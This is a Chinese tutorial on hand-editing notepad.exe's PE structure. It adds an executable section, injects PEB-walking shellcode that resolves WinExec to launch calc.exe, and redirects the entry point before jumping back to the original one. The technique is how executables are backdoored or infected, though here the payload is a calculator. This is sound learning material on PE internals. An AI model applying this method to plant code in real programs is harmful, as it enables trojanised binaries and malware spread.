目錄

• 修改記事本PE結構彈計算器Shellcode
  • 0x00 前言
  • 0x01 添加新節
    • 修改節數量
    • 節表位置
    • 添加新節表信息
  • 0x02 添加彈計算器Shellcode
    • 修改代碼
  • 0x03 修改入口點
    • 計算跳轉OEP偏移
  • 0x04 bug修復
  • 0x05 驗證結果

修改記事本PE結構彈計算器Shellcode

0x00 前言

在上一篇文章中介紹了PE節表的分析，這篇文章主要是對其進行手動實驗來加深對節表的理解，並且這里用一個記事本的例子做演示，我們用Winhex軟件通過修改、添加十六進制數據讓記事本一啟動就能彈出計算器。

整體的思路是：給記事本添加一個節，節內添加彈計算器Shellcode十六進制+jmp到原OEP(程序入口點)，修改OEP指向->新區段位置。運行記事本讓其彈計算器。

0x01 添加新節

首先需要找一個32位的記事本，我這里用的是xp系統下的notepad.exe。

修改節數量

第一步我們先修改節數量，之前都有介紹節數量在標准PE頭中的NT標識后4個字節，這里原本是3我們將其改成4。

節表位置

節表位置在可選PE頭下面，所以我們先找到可選PE頭，並且找到可選PE頭的大小就能找到節表位置了。可選PE頭大小在NT標識開始0x14字節位置。

添加新節表信息

新節信息的位置應該在節表數量*3的位置即：節表開始處+(3 x 0x28=0x78處)，一個節信息固定大小0x28。

然后我們將熒光筆中的數據覆蓋成我們新節的信息。

新節名就叫.hack把，hack節哈哈挺酷。然后節在內存中大小就設成0x1000，新節在內存中的位置為0x13000。

這個0x13000即新節位置是根據：之前最后一個節(內存中節位置+對其后節大小)計算出來的，可以根據我們上篇文章寫的工具來進行分析。

0xb000+0x8000等於0x13000，所以這是新節位置。這里一定不要算錯了要不然程序會崩潰。

接着是文件中節的大小即對其后節的大小0x1000剛好對其，所以也設置成0x1000。接着是新節在文件中的位置，這里同樣我們得到之前最后一個節在文件中的偏移，然后再加上文件中節大小就是其新節位置了。

(新節在文件中的位置)0x8400+0x8000=0x10400，然后其余還有4各成員數據默認都設置成0x00，最后一個比較關鍵之前也講過他是節的屬性，決定了改節是否可讀、寫、執行。

在這里我們直接將他設置成代碼段的屬性(包含可執行代碼),(可讀),(可執行)：0x60000020。這里不懂的可以復習下PE節表的詳細分析。

新節信息	值
Name	.hack
VirtualSize(內存中大小)	0x1000
VirtualAddress(內存中偏移)	0x13000
SizeOfRawData(文件中大小)	0x1000
PointerToRawData(文件中偏移)	0x10400
PointerToRelocations	0x00000000
PointerToLinenumbers	0x00000000
NumberOfRelocations	0x0000
NumberOfLinenumbers	0x0000
Characteristics(標志節屬性)	0x60000020

最后在0x104000位置添加0x1000數據，也就是文件末尾處我們添加0x1000個0的數據。

先用Winhex新建一個0x1000的文件

然后復制數據到notepad.exe文件末尾處。

至此新節添加完畢，我們可以來添加shellcode了。

0x02 添加彈計算器Shellcode

好了到這里我們可以來添加我們的Shellcode了，首先我們需要用匯編寫一個彈計算器的代碼，然后將其轉換成十六進制。

.386
.model flat,stdcall

; 代碼區域
.code

main:
	push ebp
	mov ebp,esp
	sub esp,20h; 開辟棧空間
    ;獲取Kernel32基址
	assume fs:nothing
	mov eax,[fs:30h]; peb結構所在地址
	mov eax,[eax+0Ch]; Ldr
	mov eax,[eax+1Ch]; 指向ntdll
	mov eax,[eax]; 指向kernelbase
	mov eax,[eax]; 指向kernel32
	mov eax,[eax+08h]; BaseAddress
    ;遍歷kernel32導出函數	
	;初始化棧空間用來保存變量
	mov DWORD PTR[ebp-04h],0; 用來存放導出函數“地址表”
	mov DWORD PTR[ebp-08h],0; 用來存放導出函數“名稱表”
	mov DWORD PTR[ebp-0Ch],0; 用來存放導出函數“序號表”
	
	; 解析PE結構獲取導出表結構實際地址
	mov ebx,DWORD PTR[eax + 3Ch]   ; NT頭偏移地址
	lea ebx,DWORD PTR[ebx + eax]   ; NT頭VA
	mov ebx,DWORD PTR[ebx + 78h]   ; 導出表結構VirtualAddress
	lea edx,DWORD PTR[ebx + eax]   ; 導出表結構實際地址
	
	; 獲取導出函數地址表VA
	mov ebx,DWORD PTR[edx + 1Ch]   ; AddressOfFunctions 偏移
	lea ebx,DWORD PTR[ebx + eax]   ; AddressOfFunctions 實際地址
	mov DWORD PTR[ebp - 04h],ebx   ; 保存到局部變量
	
	; 獲取導出函數名稱表VA
	mov ebx,DWORD PTR[edx + 20h]   ; AddressOfNames 偏移
	lea ebx,DWORD PTR[ebx + eax]   ; AddressOfNames 實際地址
	mov DWORD PTR[ebp - 08h],ebx   ; 保存到局部變量
	
	; 獲取導出函數序號表VA
	mov ebx,DWORD PTR[edx + 24h]   ; AddressOfNameOrdinals 偏移
	lea ebx,DWORD PTR[ebx + eax]   ; AddressOfNameOrdinals 實際地址
	mov DWORD PTR[ebp - 0Ch],ebx   ; 保存到局部變量
	
	; 開始遍歷三張表,找到目標函數地址
	mov edi,DWORD PTR[edx + 18h]   ; NumberOfNames循環次數
	xor ecx,ecx		       ; 清空ecx,作為循環計數
	mov esi,DWORD PTR[ebp - 08h]   ; 暫存導出函數名稱表 實際地址	
_ExportName:
	mov ebx,DWORD PTR[esi + ecx * 4];函數名稱 偏移地址
	lea ebx,DWORD PTR[ebx + eax]; 獲取第n個導出函數的名稱 實際地址

	; 判斷函數名稱  
	mov ebx,[ebx]
	cmp ebx,456E6957h;判斷是否WinE
	je _FindFunc

	;自增1,開始下一次遍歷
	inc ecx;
	jmp _ExportName
	
_FindFunc:
	;找到目標函數，獲取該函數地址VA
	mov ebx,DWORD PTR[ebp - 0Ch]    ; 序號表 實際地址
	xor edx,edx		        ; 注意序號表是2字節數組
	mov dx,WORD PTR[ebx + ecx * 2]  ; 獲取對應序號表中保存的值
	mov ebx,DWORD PTR[ebp - 04h]    ; 地址表 實際地址
	mov ebx,DWORD PTR[ebx + edx * 4]; 地址表中，目標函數地址 偏移地址
	lea eax,DWORD PTR[ebx + eax]    ; 目標函數實際地址;
; 調用函數
	jmp _gotFunc
	g_str db "calc.exe"
	g_stop db 0
_gotFunc:	call $+5
	pop ebx;獲取eip
	sub ebx,0Eh
	push 5h
	push ebx
	call eax
	; 恢復函數棧幀
	mov esp,ebp
	pop ebp
	ret
end main

end 

用MASM套件中的ml將其編譯成可執行文件，這里我推薦用RadASM這工具來寫Windows匯編代碼，他是一個專門用來寫匯編的IDE非常好用 YYDS!

然后我們用Winhex打開這個編譯好的exe提取他代碼段中的數據作為Shellcode。

修改代碼

然后我們需要將代碼在改一改，比如在shellcode的最后一個地方C3這里對應的匯編代碼是ret這樣會讓程序返回到調用的地方，這里我需要將其改成nop即：0x90。

0040101D| C3  ret
;C3改為如下90
0040101D| 90  nop

然后我們還要跳回到原來的入口點，這樣程序才能正常執行他原本的功能。

跳轉的代碼是jmp，然后我們需要計算出當前位置距離OEP的位置，目前還不知道距離所以先寫jmp 0x0000000來代替即E9 00 00 00 00

我們先把Shellcode覆蓋到新節的位置，利用WinHex的寫入hex數據來覆蓋之前的0數據。

覆蓋后的shellcode。

0x03 修改入口點

在最后我們需要修改入口點來使的notepad.exe一開始就先執行我們的shellcode代碼，不知道怎么改入口點的讀者可以看看我之前寫的文章PE頭詳細分析。

原來的入口點地址為：0x0000739D。

修改為shellcode處的入口點：0x00010400

計算跳轉OEP偏移

好了在最后我們需要把E9 00000000中的數據給填上，才能真正的完成。計算公式為：(原OEP)-((當前地址)+5)

先把光標停在E9處，然后Winhex中顯示地址為0x1049F,那么我們可以把公式中的當前地址改成0x1049F,即(0x0000739D)-((0x1049F)+5)

最后利用Python來計算下偏移，算出來是負數的因為他要往上跳，正常是應該為負數。

然后用最終用計算器將其轉換成十六進制，並且我們取他的4字節就行。

最后我們把地址給填上，收工完成。

0x04 bug修復

哈哈哈哈果然沒有那么幸運，我一運行時候發現程序報錯了。

然后仔細研究后發現，SizeofImage這個值我沒有改，得把他改成添加節后的大小0x14000。

還有就是入口點偏移沒算對，因為我發現新的段在內存中不在0x14000，而是在0x13000，應該是我們沒有把之前那個段填對其，導致我們新加的段被他對其，所以地址就變成了0x13000。

這里我計算出新的偏移：0xFFFF42F9

修復后winhex中的地址。

最后把入口點也修復成：0x13000。

0x05 驗證結果

歡迎各位加群：